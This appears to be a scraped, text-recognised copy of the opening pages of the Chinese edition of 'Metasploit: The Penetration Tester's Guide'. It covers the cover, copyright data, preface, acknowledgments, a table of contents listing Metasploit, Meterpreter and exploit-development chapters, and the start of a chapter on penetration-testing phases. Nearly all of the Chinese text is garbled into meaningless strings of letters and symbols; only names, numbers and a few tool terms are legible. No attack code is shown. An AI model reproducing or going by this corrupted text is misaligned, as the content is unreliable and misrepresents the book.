You are on page 1of 313
oa hie =f] Pt ¥ j r i Pee a Okc if * Pee CU Uo Ps PPC iG eed eee eB a u Ketek A a cere eR aCe mm CL ULL) rr Sse ee 55 Eorehe tetra reiote tied Ses “The best guide to the Metasploit Framework” — HD Moore, Metasploitli 8 za A ape te Sere Noeeaiees rd ESR eee Woes eis nee fetes ot eee Cole be ana Pa a eee eee is ke Wi HS: Cairo Cea CeCe te 40a a ono Napa Cea ai rama ines oor DIES RAEI tes BBB TAT: ey esi ise ea sR peor Sal Conca a Ne oe RS meA ea cei ca tae Ser EA SL teem tis aoe Luks wesie a BRAT ERARA fe eed f i eee lil me St eth Ce Pearse HMRI ed Tob ban Metasploif:The Penetration Tester's Guide Metasploit 214 Wikis [#1 David Kennedy, Jim O'Gorman = Devon Kearns, Mati Aharoni HD Moore EFF SR Ea WMA FE EFL £ mad Publishing House of Electronics Industry ALR-BEVING AS i or ASHE Metasploit — iE RAMA, SAT ASAT BC wi A A TOE AE, ET Metasploit #47 MA BCBMiL5 Se MMARS TMA. MMA. AVDA 17, BRT SOUR, RU. RT. BRAM E TH, HAT TRAA. KP MBALH. MALAY, AABAMR, TAMARA SR, WE ‘SFR Metasploit HMR. WARS ASAHI. AD—S— TA ADDER SHMUEL AAMAS NRA, LARLMPAMKLEMRR-ASHA LH. ARAT Metasploit JF HABA BFF, Metasploit 31 A it A HD Moore Pit: “BRA HRF I Metasploit HEA DSA”. KRSM SREP UROL A SE, OM SW TOT AH EAM A iE. Copyright © 2011 by David Kennedy, Jim O'Gorman, Devon Kearns, Mati Aharoni, Title of English-language original: Metasploit: The Penetration Tester’s Guide, ISBN 978-1-$9327-288.3, published by No Starch Press. Simplified Chinese-Language edition copyright © 2012 by Publishing House of Electronics Industry. All rights reserved. ACFE IK A (ANE A HH ABLAL HHH No Starch Press,Inc. #2F HEF TALHAEHE, eA ADELE. ALITA, BEL. PLM BABIES RMF: 01-2011-7695 BMRA (CIP) BEE Metasploit #2 iAHERS / (32) AVE (Kennedy, D.) FH; HRS HSR. AGH: AF UMA, 2012.1 (GEBRKA) B4:JRX: Metasploit: A Penetration Tester's Guide ISBN 978-7-121-15487-4 LOM U.@8- Qi TL OusALAe— ke RRA, Metasploit 1V.©TP393.08-62 FRU FH CIP BIR (2011) HF 259163 & RL: HF bn@phei.com.cn Rea. He A: BG Bl: JERE ai ALIA METER ABBR 173 FE HALE 100036 1 787X980 W/16 NFR: 19.59 FH: 445 +: 2012 1 AF 1 AN + 59.00 Te AAMT F TAH PR, AOR. SG, WAT, AARNE: (010) 88254888. FARE RIGHZE zlts@phei.com.cn, MMB DASRW AMEE dbqg@phei.com.cne FREAR: (010) 88258888. a4 AC SPH Metasploit ih FRA, RAT ALA RAE TF aE, LLRSET Metasploit ST MAEM REI RA PEA, RAEAITTIA. Metasploit A 2004 FERRE ME JS, SBN S| TR eH MEE, PEM “RES” AERA RATAN RRL A. Metasploit ALABAMA AEG T — AA A. TARR BOAR PE, Rt THA AS URL ITT SA AAT “SRE” SRT A. eb Metasploit 1 BAR RAH MET RE RE HTT, SER — LY. OE, BE 2 RAL PEL Metasploit BURT RA, KSA GRAM ORK Mt) BI. FAY (Oday 2: SAEZ BEA CE 2 WO) ) UARRHA Metasploit 4F DRAMA OBA TA. AEE, Metasploit BAR RETR —PMIREM “BR”, Buy KREUK ETEK A AME AR F NG ABERLIA— ASMA Metasploit APRA TEE CGR—AEE Syngress 7£ 2007 “FHA w Metasploit Toolkit for Penetration Testing, Exploit Development, and Vulnerability Research, {2A#¥ FABRE, KES) AAT BEI 2A TE Metasploit 4, Amazon 1A AL TT PA), HUES — 7S AIEEE ATT ELPA HIE As Metasploit 2E R425 i638 Wk BL AI GRA. REA ATART Si. 77TH Metasploit 4: 2007 “FZ itt v3.0 PSR Ruby WATERS, EDR T EE REEMA AER OEMS SA: OK HE4 MAA Offensive Security HAHA MTT RNASE. LEMMAS BRHF RNT REM, AT MR BSAA, SHU, WE Metasploit 9/F Al ARTA ST RAPA ERR TP, ZEAE, HOA Metasploit SCH PARSER HY A PRE ETT TST A HR ALS I EME, ATT SE ST MMAIZE Metasploit “ff Bit LS RFF RAR, DUR LES BL HI BARR Baik, ARAM BE RA S| S RBM ATTIRE TF Metasploit RIERA, HAGA Metasploit 24 A0I) MEETS BUUEAR , AA THEIR As RE AS HW AE YI HARD TR SSEBARAE, i LAL RE — MOREE UAE HE Metasploit SHAME REAS EM, LA Bist — Ba FR Metasploit Te RIERR AERA WAS. EA Seto, ACSA 7 Metasploit i H Bete A. #8. D. Moore AF. TET WARES TFT. ZEATER RAT, PERE EBA 28 4 Fs AG DB BE eR dR A “AEA MR SAAN, BERGA AEH Metasploit HERKTE, JF AE S AT ARIS S — A fl AES Si SPH Metasploit MAI. AMZ) 6 AR RE Offensive Security HABA GIfF EM Metasploit 548 FF 7 A GHAR, ii AURIS ROT AGRON 1S B bra AL Be, FAINT FRAIMt Offensive Security MAEHIMKZ WHESA “Metasploit BL” ERB UAT, AEM ATTN Metasploit Hi MCR She Re, BT CA ae RRA UL TSE PES a FTN He WR MEAT 1 EE, ARC Lt A aS MEAT TEL SEL. SRA DSI, ATSCE Amazon LAT HARE SLT RK IH, 727 AMAR K— BRR IA, ABATE T Amazon “e445 mi” Ae APO WEEE EM, BLT 8 AHERN ORES A FLD. Moore #2 4AHBES UF PBL: “ON Metasploit 3— ARABIA A AT: AN TAMAN TRE, TCR AARCAEMT”. ATRRLRA EA “REL” BAN) Metasploit BY. MAA TE A EES ZS, APR” WIRE TRBPEL TE, La FRAIN Metasploit ARS HM TM SRAM, HEE A Vv Fri EATS BANA & BTS, SE ELEM, PRR ABARAT 965) I TS RR ARES, RRR SIM “18. UK.” Bob, BAA eRe AIA BIRT A YE AT BRATCE SY ACRES Ot GT ELPA LARA A ERE RTA EN PER BARES, ATTRG RHE SAAR A AIR, MP. AAU —22RE el sk, BART Metasploit AA+UET T IARI, IPRA LT ate AAT SUA BE ELT HH LAR EA BE DEAT AR: MT GR", PRATER Z ART HH, PARC UE T T SEES ERE, SEE EAA ATE, PEREZ aH AR RTA AMET IE I, HES RE, EI CZ SIR a I a TRE CSHAAM, MAMA REHS RATS He, HRT, RUSHES BZ, NARITA EAGAN PPE SE “E”, HE FRERUM ACE R INTACT, PR CEE Z it, AH ER BR A PeRUATRE PS SERH A, TTA TSAR AE LTR, DIG TE RB RERY “HE” Ez ARG, BOTA TR. ASEM BEEBE PEs SABLE SURAT REE SAE, TSI DT, MRS REANLA BA, FHP Metasploit ZEA SbR AR tp OH RO SESE LNRM SI HVA, MABARAARS MSNA. CABREL, PRA eee PRA HARI ITE, FER AIR fe] HERD TAO, the AAA it TRE, HOFHAK. MMTATABRAAMAM RTE, AUR REME T ATA AE PERE SLIEMA 9 eB, A Sa Bt AA 4 I oc eT EE EA RETBL. PLUMB AT AS SE TSE AOA 5 I URN EA BOR TT RAL RT AMA, WARE A ADR RCRA EE SABE, RAN eR A BS JBURREN) Metasploit 22S BMI, ARATE MARL, HRA AMER ATTEY Web SUFI TUR SRT AE, OTA RR AEM CAN VoIP, SCADA, Ban SH ABAD, BATS ASEM. LLB Metasploit 732 ba ESR BRIM P MSA TES. SR, OBAMERE”, IEA ATSB NG RN — ARIE IS HK te PBA AF FF ACA ETAT RA TART ER], TR aT BBA AEF RE Zhe VAT RAE HIE FRR AM) Metasploit v4.0, PHM ABAMRR AA A. RRS FIBA RIN Metasploit 2 Suiits, aE Ay eR eB A TEP OS TE LIP TE: MRE. HAI 1. 2, 13, 14, 1S. 17, ETRE R34. 5. 7. OR, PNAATERS 10. 11, 16 AIR B, RES 6, ABER 8 He, FARES 12 SSH A. SAA UTE. FPS ST. PEARS HOSEL S| BEANE LAE HLM HL BS aa S28 TBAT A A HSS PPAF. BRT TA TERA. Hk, FROIN. eR et 2011 #8 ATR AE A HO F TT de ANE SA, FRE EE LI EAR OR Sy MAAR IL. PPLE ee EO SEADT A, A BEF SEH Oe BOLE AT SE FE SP, DRE MERRIE, TUL ES UT BCR Ah BRMRA “TEC AARREM Le. KEAN, ARUEABAERS, 1 FAG TEAR IAAP RT” BR, PEASE SD AR OP I, SHE Beri. ANSEL, RAE OLS AT EEE DAT. SOLAR: AMAA SRD Be PT LAB EEA IE RL ES A PI, BZN MEY AA HE ALIA TE SUE AT BENITA REAL APARN SEER, BU RAPHE BA. — RIAD AWA RA) — MAME, TRB RKAA RHE EAA RM, REN RAMEE OS. ISN, DP CRE eA xv RIEL DAB BEL TER RIDE HE AES EAL, LER MIE HEYA, PATRAS it UT AEE IRE BALA ITAERY TO-DO Fi FP. BREDA SRT DIR 2 ak Ls ot Rs Hk, Lk BRP ERE UA TARE Bi REE TEAS AA BB sh EET WBMES MATA a) PBR TR, MATS AIS PR CR, WRAL A BEL AES A RE AT AAR MAI AT ABSA RR HE FR. LAMA HA A BT AE PTI, ARR RR BS TAA ks BEA SAIN eA IE A ET, WORE SSR BAS SAR TEA MIR LW. BIT RAR — TREE HAWS EMAAR HET A SUR, BE NRA PO RGAE RGAE: Led OpenVMS KAILA Set ES BL LAMAR, MR TIS AT Windows XP fh -6 X EHLERS RET RT BO Hi, RHKRN RAS NDR AMIN, BAILA SEA RX — A eB SRRLBBED T ARMS PATA EEA FLY I hi BAA HA EH PRE TAS PSR A UE LAAN AF ET ARN TA, Tt BRR PEAR, CARRY IEA Hie MSA TH 1 5 LAE DD « PEAR TE, GRE SA DUA See eH ALP AA A A, Ti ALAS A PY BEAR Ky PAE SER AS BAR REE R, RAIS ABA RS FRETRFRNRRRS. CHM LEAA- BRP REVARRNBM, T eee RE TRA TA NERE SY. WAREZ , BER THe ERMC HARA, RN Cita SOSH KERMRN TESS. HLRNBEMRA ay DL BSE TS RAT BREA HP Be oe, TTT EAT RS TFT AULA A BF TAT OBA HS. ATA T HR RR REN. TT EE ARE MEW TATE TE HAE. AHL GE F Metasploit SBMA RK NS Bs. Metasploit FMF BIE T -- SAAT EH AAA ENB GE. RIN WS SNe TI Ae TALE T — ERATE FRI. ATASMH T Metasploit Express #il Metasploit Pro ——Metasploit E38 7 RMA IPT FST A, SAL a BEAT — 2K A A SER PET Bu RHE) 6 XVI Metasploit HERE7EAUESIN Be SL FGM Lk “FSA TAR” 1, EARS A IEE FAB ASCE 2k BAL TTR TE UK. TERA, Hy Metasploit G—ATMABLE —F ABTA: TRIN RABI TR, REMAN TTT. PEATE TROVRAMES, PMMA BERRA TN, ARIA ISIN. ‘Metasploit FF Az ABA 5 T KAS SAUTE A, CLG ER IT 4 RH 5 ABT Be HW A, ERATE ATE: I AR4EXt Metasploit HRM “RA” MiB T AA PRY. FRNTAT EMR Ge FE HE ELS ARLE KY Metasploit HERB AS. TATA BAR TS REAE TEAS LED RE OME, HF EAR SPEIER EB LON TR BUTT IN — RBS HD Moore Metasploit 38 £ 4/46 ———4E Metasploit FEAR Bi 544754 S¢- 4° WR MARE BY TA AF a Tad EL BRT URES A AE ER Zh, NL A A — BE AD RAS TE Offensive-Security HIMFR 1 “Metasploit #48” RAE ZL RAB T EAB. KMRL KEZIBAA, No Starch HAL RIA BART RE “Metasploit 4” BAKE — AEA BTFIAT HE. UIE RAL Bt HULK TAF Metasploit A991 AHR, UL 28 ante ARCH Se HE Metasploit HE SEE AVES TAT BRAT TERY EA PASS Be ths BI DR A A SE) BTR LETS RMB AAR, RASS ik RT A A a MAR, WB RK Oo A Metasploit 773K BUFR STEIN, B24149 2) Metasploit Jil 5 #4 A HD Moore M— uae. HE FUND HW FF RBAT “Metasploit HAL” TERA RIT. BUT PIN —LER TA T— Us “RAMSAR ORE”. ME ROMTA LM ARP, HD LRAT —A “Aa PREFS ELTA”. PR IE ERAT SSR RY A HS GB TCR To HATH, BURR BAB RBM IAI, GRAB Metasploit RAEN PIKE. STOOL, IERUTABE. RATS Heath BA Re $5 8277 138 EAI HID SY 7 AY DEE ALE RA ZE Metasploit HEAR HG BI TAR HD EN EBL, BUTT ts MA RE EA GAB 5 ZUR EA RE . TTR ATURE TE RR MOAT, 2H He CAT PUTER TES AUB, MCRAE BT EE aL BEGET tk ER 41). 995 5H 4) RIAL Metasploit JT SHABA: HD Moore, James Lee, David D. Rude II, Tod Beardsley, Jonathan Cran, Stephen Fewer, Joshua Drake, Mario Ceballos, Ramon Valle, Patrick Webster, Efrain Torres, Alexandre Maloteaux, Wei Chen, Steve Tornio, Nathan Keltner, Chris Gates, Carlos Perez, Matt Weeks #l Raphael Mudge. 54h —/S#i Sh HUBS Carlos Perez, fh #8) F119 Meterpreter BUA RE HTNS AA AEH ABU Scon White, ABARAT, BARS A RIN LEER. WI Offensive-Security FABLA$ RA] Hi4i te —i2, Offensive-Security HIB IMAI “Try Harder” BE RAM RRM RM (BASIE ryujin). XX RNA EABROME ACHES OH, GERM AREAS T, ALE — PE, TO AREA MLR. DRT REP OT AH Ae eB, BRAT LIT BAR AT. — AME SEAN BOM EHS No Starch HANSEL OSIRIA CANT, RBG AAT Ay AN 1 LT CEH BO ELA, SRS THE. Bill, Alison, Travis Al Tyler, S441 No Starch HALAS LPT AEA SETAE, BAAR RTM ! SUF, EAR RM RE, RMBCAAGMTA-TRUAATAT, RAMETA SOU IER LL, TUBA ALBUM LAN ARATTE— i. I BUR. BRIER, TR 40095-S EIER]} —EPATAS, R RR R, BK svn EB TETE 5, SERS Fuzz BUR BHRK, Bee DARA BO Dave (Twitter: @dave_rellk): BUSA CRM MMS LE) WRT BL] ASHE Erin, bh zh ET RRP AHA ERE. RRS AT, MERI EAE. PRESTR SS 3% Jim FIRE Janna, LRA Deb, WN MIME INEIERRA . BAH Jim. Dookie fi Mots ZEA AS HE TE, BR RAE A AZ © BU SLZE Offensive-Security HABA ist Kk: Chris “Logan” Hadnagy. Skit) 5.3 Shawn Sullivan, URRZE Diebold 45] fia] 4T]. Beat PLEA HD Moore, ek} Se eb HIE ABABA as REBT PAN DAT HAL, BEM Scott Angelo AR—MULAIHAER. KG, BM LA, Beth, Rit baa ABE WHE. Devon (@dookie2000ca): AFR A AAMT, MAS RAE ae T RAAT, WER RERH RB SAR, WRT EEE ARG, BAT] EMR AERTS. UBER. MPT FERIR TBA TARR AH. REI BEB Mati, AL PEAT ROM ORAVRIA, RIL T Blas. Muts (@backtracklinux): FSB A TAYE HE. ARATE AS TSR A PIES Td IE SA GREE. BHF Jim, Devon Al Dave Fi HF ERE MAN Be AUT Se SE EF EK TE Jim (@_Elwood_): isi Matteo. Chris “Logan” #IRii Offensive-Security HIBLAtK Fi]. FSMUARABIR Robert, Matt. Chris AIRE StrikeForce FIFA]. WW AMRF Melissa: EWE DRG NAPLES RL WIA ERS 353) TERE. BN Jack Fl Joe, ARE EBB OMRRRA ORIEL EON REED MIR, WNETARR Et pe BEWA. BBA TEA Mati, Devon Fl Dave: MARIE SF Bee L— Bae RARE. XXI | : R-PRRARHDR, a Re — RS A, BEER BCE Fa Be Hy ANY Bee a PS A HAZ PA RT CPT ” —RRMA Metasploit, AMA RARM ML HAZ a, RBI T — “HN”, HARP RMS RMB, ALARM AAT MP TRL, HERA HI RULE. HERS A RR, TRONS ALE, TR ER, RAE REPL. ALI), (ILM TRIM REO MM CK, HET UR HT WP HEF ER. RHR T UR LH, Th Ma FEES aR, BOE A A ROR T « SAREE, DLS MAMA RE ANE LT IR THAR AS ARAL F ff, IRL AR LE BEBE Be ER TIA, THAT ITA. AMA LAU eT LF. XXII Att Awe TE Mit AENLAERP KAR A BEN ETRE AT SCT 7G, RAR OR, BLE SURGE Ab IE ATP ERTL AE BE ETM CH eH OR AEE A PTA TG SK SLL RUC RR OS AT HET OL hl, RA eH Be aT TNA RHEL PR RK “OEREAHM, PACER EERE RT RARER, MARL PRE MER AK, RTA MTA PRA, FER MEAS eE PAIR BREA » Att 4# Metasploit Metasploit HARRE-TLAM, CAA AFAR. MLA. ART RAY THgatr SE OE AR A AL FF — Ae A ARE RT SP ER RL A HOA L, UR MMR RREH R A AL. ORL ERE DEA Eee ke — ee MRR, PAT LL Blo LEMS HU SERO RIL EL PS Be RRA Metasploit #2329 /'. Metasploit fei LEMME CBRE, BRT A RE SRB, CATA ae AT BARROSHRA. EAH, RATS AILTEF Metasploit RAAB OA = 7 TA Hh HEE AEA TSS A. BRUNIA A BRIELLE ORFS} AAR Metasploit HERR, 29 Miia ERD A, TRIN NER. RATER NAST AREA. BEAR, URANO Metasploit 4 fe aj 2 Metasploit S29) EE HD Moore HATPRAAAN, AA HD AE—-TREA REA, Aft LB He 0G AS BH i) FS PE EE AA ke A OT, AMET Bt A Ba A FRB OAR 7A RIG ATT ERE, 2003 4 10 Fi AeA T ABTA Perl HS Metasploit A, INSERT 11 RBG BOR. HD ¥ 2004 ¢F 4 A Sta T E'S HY Metasploit 2.0, IXMBRAGA T 19 NEB RARE 27 POH RAT. AURAL GAA, Matt Miller (Skape) IAT Metasploit 744 BA, BAH EDR ATE, Metasploit ARMA TRA RRA MARTA, FFA RRA MEM RSG STR {EAE FA Ruby Sa Bi WT T tk 76 E'S ZI, Metasploit AIBAZE 2007 4 S24 £ Metasploit 3.0. Metasploit #242 A Perl #) Ruby MAHI HEE T 18 Sh), SRR Pict 15 ATT. BAA 3.0 MAMIRAT, Metasploit HAAR T BUSES RE, SHER ATREHRE. 2009 44K2E, Metasploit Wee tsi SUR — HR GF PL Rapid? AIK, Rapid? 27] ft TP HD RSE —MA, ET Metasploit HERMIT. A MWR a, Metasploit Aft ERLE] ABT BUM MERA & . Rapid? 27] 7 Metasploit HEA HAE Lt eA T Bak NRAS: Metasploit Express #11 Metasploit Pro. Metasploit Express °F GUI FMM HBA Metasploit HEAR, FERN T HERE IH fe. LHR HA Ae AL HE Ath — ee FP HE Metasploit Pro Jil Metasploit Express [4° RRR AR, SEW SCHF LLIB Wt Jy he BSB RIL Fe, HODAT ON SRO AE VPN TB SiR SA UAE. KERB AHL AEA UMM Metasploit SM B)B5 citi REAM HA RTALSLAE, BR A) BE AE TAB, AEWA ASRS, RTT PUA BAER OTE BAT «SUPE EB MR I A A. AA #200 Ruby SA Python HFEIE TE, BARBUS 2 HR Ruby Be Python ix FE— PNIROELIA Ey. FEW UREA T EIR a UE IE, ERP A TR TORN B I. SUE Metasploit 2G, MRL: Metasploit ARE — WAH BR, IMGT ART FORE. BRU AUTH. ASAE SIT, Metasploit PR SITE RM, BA A REOIRE MUERTE, BBR TENE PAH, By — BAK HERE T Metasploit Sf CHE, SBA RED) A PRM 2 TAP AIS AS Metasploit HAAR A AT « REAR JACM A RE BHO ATT SPL EE BE EL AA SB? ERE eT ASE TSE ABE, SSPE LED SA TE et RE HD PB AALS BA AA © Hl: “BCAMREABH”, HHKARTRATSAMRNTA. © F2H. “Metasploit MA”, S| SRW IA Metasploit HARA MSH LI. © 3. TARR”, RR CEBU ET ALT Metasploit S25 tii fe BHA FLITE. 4 is ITE”, FR NGO RL Re I IE FEY AL BEA OBS Hi: “HZ ie”, AREA BATE. 356 i: “Meterpreter”, Lb (ts Win a Seat Mt Bk tS +E 7] —Meterpreter. BT E: RATEAR”, RENAME ETRE RAS 8: RPMI”, WAAR P ae TAM Bak eT. SE 9 Hi: “Metasploit BAUR”, THK T REHAB EEL HE DH. S10 RH: “HE TET”, BORER eH HI SET BAST. SELL Ht: “Fast-Track”, 29421 TAT Fast-Track——~-4* BBS BMA ERA. 98 12 Hf: “Karmetasploit KAIEE”, AGE aa AT Karmetasploit 47 RIL die © F813 Hi: “RSA CAR”, ARON aS BC ECT © F516 Fi: “Meterpreter MAME”, Arta litle SK © R17 Re: BS 14 Si “CUR CBA”, SPA Fuze MRE, CAR Uta Ae RHC BABE ARR OURS ATT B15 Hi: OAS AUSEALS) Metasploit HE UM Metasploit HEARHER ME. TAH DA ERB 8 ity Meterpreter fl A. URED NSM TAR”. HOTA MRR TE. OR SLR ETT — ik BUBIN BIB Bch. FT HBKBHN RS BRATS ACY A Aa TD PRIN AMA EERE. HE KIWIS, BATAT Cee ELH, RAR LA. ATM, ice Fae on PERT ER BBG RERET, ERARA BHR, RESET BH: AGU IT NAB AVR SURF TEE, RBA, UR ET BIE AS FCA BER, ACTA TR—No Starch HARE: CPRANE: FR ba aR are PS RRR —— HF TMH RRL), HBAS SAR TFA i RET WTA, WA PERT ICAT ET SFE, BUTE FELL EAE. TA i RRL TBR AAR, RT BF AG HK BE PRWARKRKA. 1.1 PTES RHE PHSB MRTR Ld 12 13 14 1s 11.6 Jae 1.1.7 RADE... 12 Pe MRAM. 1.2.1 Asealik 122 Raw 1.3 WTS. B2 14 =z 24 23 nv 23 3.2 33 MNGi Metasploit S¢ft... SAGE. 211 24.2 21.3 214 24.5 Metasploit F401... 224 22.2 2.23 Metasploit SHE RLF. 23.1 2.3.2 233 Metaspl NE TAIRIEEE RING. 3.L 3.12 3.13 ASN BADR. 3.21 3.2.2 3.23 SOMES i. 33.1 3.3.2 33.3 33.4 3.3.5 GBCli (Exploit) Wai (Payload) Shellcode.. Be (Module) KiMT#$ (Listener) MSF ££. MSF fir 4 Armitage... MSF Bc hi dhi ir 42 1 28. MSF S328 Nasm Shell... whois # i] Netcraft. NSLookup 44 Nmap BET HH daa +E Metasploit + 18 Ai SE. (4H Metasploit 2473 OFS. RSH BROW... 1 FCB 4H) Microsoft SQL Server.. SSH Fi25 Bi PTP Aft .. fi) A IA. 34 35 4% 41 42 44 45 Bh 5.1 5.2 53 SS A CHa. ANE cn eA F....... FEA HUTTE... {FA NeXpose 4741418 42.1 ACR. 4.2.2 HRA SAB] Metasploit 4.2.3 €£ MSF Hib] ft Hi24T NeXpos 44 Nessus UTA 43.1 NUE Nessus... 43.2 fst Nessus Fi 98% 43.3 TAT Nessus 414% 43.4 Nessus #4... 43.5 ETH A Metasploit HEP 43.6 7E Metasploit A ABLEFH Nessus MEfT#48 . GAARA... 44.1 iE SMB EEX 4.4.2 JAIRIFRIN VNC 24. 44.3 FuRIT IN XI RS AA RT Bat Bea, BENZ. BRA AA.. 5.1.1 msf> show exploits 3.1.2 msf> show auxiliary 5.1.3 msf> show options Sa 5.15 5.1.6 ST 518 51.9 5.4 A BORAT: eA BR a. 5.5 BBOCIE..... 5.6 Nii 386% Meterpreter..... 6.1 3K Windows XP s#i04L ... 6.1.1 (HH Nmap #13 0 6.1.2 Btai MS SQL. 6.1.3 Sk AER MS SQL IRS 88 6.1.4 xp_omdshell.... 6.1.5 Meterpreter BAIS 6.8.3 PERSE A 68.4 AAA LLM TM. 68.5 RNASE, 6.8.6 PEA 6.9 [i a SEU A... 6.10 Hr S47 Shell ABA Moterprcter. 6.11 ERLE DN MY Railgun 411¢#2/2 Windows API 6.12 ANB BH RRRK... 7.1 ABFA MSP Bc iti Bitar CAS CY ie AF A HE 7.2 PRREEHNII... 13 14 15 16 Bee 8. 82 83 84 85 8.6 98 OL 92 93 #108 10.1 10.2 10.3 10.4 10.5 10.6 7.2.1 (FR MSF 98525. 722 SBR... EE NAT SAAT EA. ea bd Jed oh — Pc a INFERH.. WG: RY BAER BE BPE... THM NS BIH... 811 BPR AREA RA, 81.2 BRS... . 48) Immunity PARISHES LR. ON TE 3) Si aR MAR ERLE TA A . SOP ATS a, ll Metasploit #4 E782 ... HUH FBS BUR BH AE He leFIARe.... Ac SET TA. EERE PY Ate Bee Web Beit Fat 10.3.1 Java Applet... 10.3.2 %/ 78 Web Bri. 1033 103.4 103.5 103.6 103.7 FREI RAE... ‘Teensy USB HID 407 (Et SET USCA HE 10.7 BUR Wl 2. 3 14 812% 121 12.2 12.3 12.4 12.5 813% 13.1 13.2 13.3 13.4 84s 14.1 142 143 ANB FaSt-THAaCk «....-ceecsssssseseesesseesceececnennsnesnesesecesecececnnnnnanmnesseeseeesansensnmneercecsteres TOD Microsoft SQL #2 A LLL. SQLYEA— iis 65 11.1.2 SQL A—POST BSH M13 FLEA... 11.1.4 MS SQL wE#F. 11.1.5 jit SQL Aaa EH) (SQLPwnage) BENE) 1 AEB. RUE PRB ANS: OE GB EAS RE eee eeen Karmetasploit Fe Ucai 2+ MERA OMRER...... 7E MS SQL Litt tr OB ..... RR—P ATEN Metasploit AUR 133.1 13.3.2 i247 Shell SiMe. 13.3.3 4a powershell_upload_exec AM 13.3.4 133.5 13.3.6 Ais BEER A CRE RAR... Fuzz MRE... SSAA Ses Mh. EL SEH PRB eset ccessenceneentsneneencenntscennenetnni 144 14.5 14.6 Bis e 15.1 15.2 153 154 816 16.1 16.2 163 16.4 16.5 B17 171 17.2 173 17.4 SRBGE [alt REN ARDY Ang FSSA Metasploit #32... SCO a. 15.1.1 EIP Ail ESP #4725 15.1.2 IMP 43k... 15.1.3 SARS ASRS HT OR PR Dx Ba RE. 15.2.1 BRB — 4 A HB HU, 15.2.2 ieee sa 15.2.3 BUGRR ATT Ye 15.2.4 SEBUM AUP HE... 15.2.5 JM ANBENLE.... 15.2.6 ABRAHE SMT 15.2.7 ABROYAY Shellcod 15.2.8 FRASER RES. SEH BiB (004 .. NFB oo Meterpreter BY ARS AE ..... Meterpreter HA SF? Sem... Meterpreter API. 16.2.1 47 ET 16.2.2 eA API HAF 16.2.3 Meterpreter Mixins. 9835 Meterpreter JAAS AAR. 42 A AMY Meterpreter JA. A RANE EMRE .... WOME E.. TRIB. UPPER. asd. 17.5 MSF Se sea yi 8 ctr 17.6 HEM: 17.6.1 414i Metasploitable #841 17.6.2 WTA NIRS... 17.7 Baz Apache Tomcat. 17.8 ti — TAS 17.9 FSR ASH ERE... VINO ANGE crcceeneeee ARA REAR HRB SOBs wR BO BEMARAR 2SAWL (Penetration Testing) A AAT SU MAAS I, PC BAR ABE PETRA ABN eM TK. BML EAE Ba a hie Tee AAG TAL, GRE RS HR. MANATEE EE 2c TB a Re % NS BHAA, RAAB AMR CRAEA RR, ARIA BT i BE UR. Ril, ROH AT A MBAMRLR NARA TEE, CRRA LAE SET RA ASEM IRIA AT NE (PTES: Penetration Testing Execution Standard) iE TEX BEM RETRREL, MME ORS LET SBME ROBREMBR, KE XK-KAEMPBMRLE, PGARAWA MZ UR. BORMAN “RE” A “BS” Tar, MRM ASEM RM, RAS AM ATMEL E A PAA, WAV Aup-/ wow pentest-standard org/ik Tit —310 TF» Metasploit i it i5 1.1 PTES sr PASI MAH PES An YE} (15 38 BY DEBT BLE FSR ECB A OUR, FP OR RE AR BE a OA — A EE, HO RR REIS MR, TTI eH ERT IR RAPT. BRR EAR CANNEL, HE EAE SBR aE CATA] US RB, TTR Ae I Be eR PTE. LEAL — BBWAA, ULAR TA TE PERE BH RT ABA EERE» 1.1.1 RMR ARE MRE MBE SET, RESTA A te. KT FE EAE AG BEAL Ae 2A SA a TE DOE BR TAK NT HE PRT OLS, PLACA ae A A I, POST AT AR HB HGEAT SEBO. 1.1.2 TRIMER CREAT RL, Wi RAS RENAE RRR NEAR, FUN H CHEM. Google Hacking HA. ARASH. ME ABCRMIRE. fe ER REAR AL A be REI). CURE ATAU, DA TL BOAT EBC AG EL AR FSA TARA BA 1s A FB BR HA IT Be TERR BT, PHASE PEN, Hee TE BRR SE Se BT Be dee BA RIBL. ASR, — SALEEM Ba BN a, Pe ee RR RA MST, ATLAS BZ I LER IN, AA OMA FRM RREAT BRLIBT 5 SULA HE I TAT A BP A TE 9M TSA OP SL RET A SPM, MIKA IP Hebe AS eR Se OM A SN). PR ERER Web IV ALERIF RY, 2% ATARI, HERA Web IFT REAEA Web [JH 5 2A Sits Mi tit 22 PRP PRT aA ARR it — Ke ELS SAA IP EFT ORT, EMR AGRI TP Bek FE OR Pa T NAB LE BA RA I UT CREA BACT BA AB 8 ED IC EB, (A TP HD TE FER Us. Z RF, I LS A RAR SABLE. TA HTD TET HRT — BESSA CES EE HS PGA EB BR HR: TARAS EER RESKSATART AS AME IP Ha, RELATE BI” Ob tad, AT ARE PI RG HEB RAF forts Bt PARA OK HIEAPRR, 1.1.3 PERT ER eS E A: BER FE ct RAAB LTO, RRR BRR LAT RARE Bi BRMRRRBE MISS. CERT RUDDER, isan I BOI. TEE EY A, DBIAMBLECHE ERG TERT EL, AL Be ALR Eb EB, AR FE UL BCS LAG AUR SAA AH FL ba RSE a» 1.1.4 HRS AERA TTA Ja, IRAE ORS BR REET AR. CERT PEAT, AE GR ES ANTRAL PRS BUTE TEAM SP AO ara Pe ATH. HARRAH A eR, SUIS “RO A, DUR EHR PUA ABNEY SU Re 1.1.5 SRBwT ER SSBB OY fe REIS ALT A J AT, PART CESS PERF BT, BBR, WALD”, TAA SR a”. A oc AL: a A zB HE a De LTH AOI GR, ADLER BANA REAR BB, RAE RSE PART AE FE AER BL WANE PM, ARRAY. (UERIENE, EREREMR— TR WAIN, UNE zaATBTI T ARTE A RRS LET RI. UT ABE NZ APRA L— shell HALE, MP AG SA RE REE, TS OE FRU A AVL RATA BARRE EET A BA. TSE NR, Ps ESET A es RES BLT RAR AMA NE ERC, ROR AA ATER A 11.6 RBS EBERT AMMO T PAR RN SR EZ IPO. (LR EMTALA RS HE. FSI AE — VBE MALE EP EA TS, TO te BAER ALA AEP AA Ah FAI BD, SUE MSP AREA HE A IE TEDL DEE HINES RSEPE A bs, DUR RRR, FPR PU Te A BRUTE HA RMAE, SUM TRERAD—TRR, UBT HAE PP HE SEN FBG Be. PETER BET RABY, HALAS HT RAE PA UR EMNIPRAMAP BE, SOP, BAKES T-TREE S, WOR RU, RA I, RCRA Ne, AES OSI Biot Bl SAR Sr MET SAS DI EIT FBR 2 RSA ae AS ARB SEND RATES TT? PRED LMR RB, IEE RRS, HES TA ROK ABS BBBI— ANISH ATI EME? (HAE Ze LER MY SOT AL I AB 2 Metasploit #8 Mitta BALI BE PSU — RA ALTE PELE, EPR DS HT ED BR Jet BEE AMAT DR SP SEE HER OR A. AE EAI TE ES PL 1, Fe SA EPG 